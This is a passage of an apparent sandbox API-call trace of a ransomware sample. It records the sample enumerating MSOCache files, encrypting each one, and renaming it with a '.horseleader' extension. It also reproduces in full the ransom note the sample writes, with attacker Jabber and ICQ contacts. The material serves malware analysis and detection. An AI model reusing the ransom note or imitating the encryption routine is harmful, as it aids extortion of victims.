Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.horseleader")) returned 1 [0161.472] GetProcessHeap () returned 0x780000 [0161.472] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b3178 | out: hHeap=0x780000) returned 1 [0161.472] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="OutlookMUI.xml", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0161.472] lstrcmpiW (lpString1="OutlookMUI.xml", lpString2="Windows") returned -1 [0161.472] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 81 [0161.472] StrStrIW (lpFirst="OutlookMUI.xml", lpSrch=".horseleader") returned 0x0 [0161.472] lstrcmpW (lpString1="OutlookMUI.xml", lpString2="#Decrypt#.txt") returned 1 [0161.472] lstrcmpW (lpString1="OutlookMUI.xml", lpString2="_uninstalling_.png") returned 1 [0161.472] lstrlenW (lpString=".testttjffg") returned 11 [0161.472] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpSrch=".testttjffg") returned 0x0 [0161.472] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0161.473] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0161.473] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0161.473] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 81 [0161.473] StrStrW (lpFirst="OutlookMUI.xml", lpSrch=".txt") returned 0x0 [0161.473] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=3186) returned 1 [0161.474] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0xc72, lpOverlapped=0x0) returned 1 [0161.477] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff38e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0161.477] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0xc72, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0xc72, lpOverlapped=0x0) returned 1 [0161.477] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.478] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0161.478] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0161.478] CloseHandle (hObject=0x21c) returned 1 [0161.483] GetProcessHeap () returned 0x780000 [0161.483] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b3178 [0161.484] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.horseleader") returned 93 [0161.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.horseleader")) returned 1 [0161.485] GetProcessHeap () returned 0x780000 [0161.485] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b3178 | out: hHeap=0x780000) returned 1 [0161.485] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0161.485] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0161.485] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0161.485] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0161.485] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0161.485] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0161.485] lstrlenW (lpString=".testttjffg") returned 11 [0161.485] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0161.485] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0161.485] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0161.485] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0161.487] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0161.488] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0161.488] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=4207) returned 1 [0161.488] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x106f, lpOverlapped=0x0) returned 1 [0161.490] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffef91, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0161.490] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x106f, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x106f, lpOverlapped=0x0) returned 1 [0161.491] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.491] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0161.491] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0161.491] CloseHandle (hObject=0x21c) returned 1 [0161.496] GetProcessHeap () returned 0x780000 [0161.496] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b3178 [0161.496] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0161.496] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0161.497] GetProcessHeap () returned 0x780000 [0161.497] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b3178 | out: hHeap=0x780000) returned 1 [0161.497] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0161.497] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0161.497] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0161.497] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0161.498] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0161.498] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0161.500] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0161.500] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0161.500] CloseHandle (hObject=0x1cc) returned 1 [0161.500] GetProcessHeap () returned 0x780000 [0161.500] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0161.500] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-001B-0409-1000-0000000FF1CE}-C", cAlternateFileName="{94E50~1")) returned 1 [0161.501] lstrcmpiW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0161.501] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C") returned 66 [0161.501] lstrcmpW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0161.501] lstrcmpW (lpString1="{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0161.501] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0161.501] GetProcessHeap () returned 0x780000 [0161.501] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0161.501] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*") returned 68 [0161.501] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0161.503] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0161.503] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\.") returned 68 [0161.503] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0161.503] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0161.503] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0161.503] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0161.503] lstrlenW (lpString=".testttjffg") returned 11 [0161.503] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0161.503] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0161.503] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0161.503] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.504] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfc8a9170, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfe076d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0161.504] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0161.504] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\..") returned 69 [0161.504] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0161.504] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0161.504] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0161.504] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0161.504] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0161.504] lstrlenW (lpString=".testttjffg") returned 11 [0161.504] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0161.504] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0161.504] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0161.504] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\.." (normalized: "c:\\msocache\\all users"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0161.505] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfe076d70, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x978, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0161.505] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0161.505] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0161.505] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0161.505] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0161.505] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0161.505] lstrlenW (lpString=".testttjffg") returned 11 [0161.505] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0161.505] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0161.505] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0161.505] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0161.506] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0161.506] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0161.506] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2424) returned 1 [0161.506] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x978, lpOverlapped=0x0) returned 1 [0161.517] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffff688, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0161.518] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x978, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x978, lpOverlapped=0x0) returned 1 [0161.518] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0161.518] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0161.518] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0161.518] CloseHandle (hObject=0x21c) returned 1 [0161.523] GetProcessHeap () returned 0x780000 [0161.523] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b3178 [0161.524] wnsprintfW (in: pszDest=0x7b3178, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0161.524] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0161.535] GetProcessHeap () returned 0x780000 [0161.535] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b3178 | out: hHeap=0x780000) returned 1 [0161.535] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: 